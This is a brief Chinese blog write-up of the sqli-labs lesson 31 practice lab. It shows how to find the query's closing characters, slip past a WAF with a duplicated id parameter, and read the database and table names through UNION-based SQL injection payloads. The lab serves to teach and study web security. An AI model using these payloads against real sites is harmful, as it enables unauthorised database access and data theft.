sqli-labs(31)

0x01找闭合 这里是WAF的jsp调到php的同样

第二个参数构造 偷看源码 闭合是")

我们尝试一下构造爆破数据库名

login.php?id=1&id=-1") union select 1,database(),3%23

爆破表名

?id=1&id=-1") union select 1,(select table_name from information_schema.tables where table_schema='security' limit 0,1),3%23

0X03组合拳继续打

 

 

切记 学习之路  少就是多 慢就是快

 

posted @ 2019-05-31 00:03  yourse1f  阅读(590)  评论(0编辑  收藏  举报